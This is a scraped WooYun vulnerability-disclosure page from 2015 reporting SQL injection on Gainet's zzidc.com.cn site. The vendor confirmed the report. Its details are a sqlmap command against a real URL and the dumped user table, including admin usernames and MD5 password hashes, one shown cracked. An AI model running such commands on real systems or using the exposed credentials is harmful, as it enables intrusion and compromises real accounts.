景安网络主站SQL注射漏洞 | wooyun-2015-0147810| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147810

漏洞标题：景安网络主站SQL注射漏洞

漏洞作者：冷白开。

提交时间：2015-10-23 02:35

修复时间：2015-12-10 11:18

公开时间：2015-12-10 11:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-23：细节已通知厂商并且等待厂商处理中
2015-10-26：厂商已经确认，细节仅向厂商公开
2015-11-05：细节向核心白帽子及相关领域专家公开
2015-11-15：细节向普通白帽子公开
2015-11-25：细节向实习白帽子公开
2015-12-10：细节向公众公开

简要描述：

郑州市景安计算机网络技术有限公司（GAINET）成立于2004年，是一家专业致力于电信基础服务运营的高科技民营企业。公司从2005年至今已陆续建设绿色高效的互联网数据中心，机房可容纳万台服务器。

详细说明：

sqlmap.py -u "http://www.zzidc.com.cn/index.php?cn-s-l-1-1.html" --data "keyword=88952634" --dbs

Database: zzidc_news
Table: mc_users
[16 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| f_address    | varchar(255) |
| f_company    | varchar(255) |
| f_email      | varchar(255) |
| f_id         | int(10)      |
| f_im         | varchar(255) |
| f_loginIp    | varchar(255) |
| f_loginTime  | int(10)      |
| f_loginTimes | smallint(6)  |
| f_name       | varchar(255) |
| f_postcode   | varchar(255) |
| f_regIp      | varchar(255) |
| f_regTime    | int(10)      |
| f_status     | tinyint(1)   |
| f_tel        | varchar(255) |
| f_userName   | varchar(255) |
| f_userPwd    | varchar(255) |
+--------------+--------------+
Database: zzidc_news
Table: mc_users
[3 entries]
+------------+
| f_userName |
+------------+
| admin      |
| admins     |
| zzidc      |
+------------+
Database: zzidc_news
Table: mc_users
[3 entries]
+------------------------------------------+
| f_userPwd                                |
+------------------------------------------+
| 21232f297a57a5a743894a0e4a801fc3 (admin) |
| dd1a3dc4a085179e70b2b8993a6ec9b8 (zzidc) |
| dd1a3dc4a085179e70b2b8993a6ec9b8 (zzidc) |
+------------------------------------------+

密码可解密

漏洞证明：

综上

修复方案：

你们懂

版权声明：转载请注明来源冷白开。@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-10-26 11:18

厂商回复：

感谢！我们将尽快完成修复

漏洞评价：

评价

2015-10-29 14:41 | ki11y0u ( 普通白帽子 | Rank:134 漏洞数:26 | 好好学习，求带飞~~~~~~~~~~~~~~~~~~~~~~...)

@景安网络修复了，公开看下呗~
2015-11-05 17:58 | 西西 ( 实习白帽子 | Rank:71 漏洞数:27 | 走过路过不会错过！)

提醒：目前漏洞有限制开放中，你的 Rank 级别不够

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147810

漏洞标题：景安网络主站SQL注射漏洞

相关厂商：景安网络

漏洞作者：冷白开。

提交时间：2015-10-23 02:35

修复时间：2015-12-10 11:18

公开时间：2015-12-10 11:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源冷白开。@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147810

漏洞标题：景安网络主站SQL注射漏洞

相关厂商：景安网络

漏洞作者： 冷白开。

提交时间：2015-10-23 02:35

修复时间：2015-12-10 11:18

公开时间：2015-12-10 11:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0147810"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 冷白开。@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：冷白开。

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源冷白开。@乌云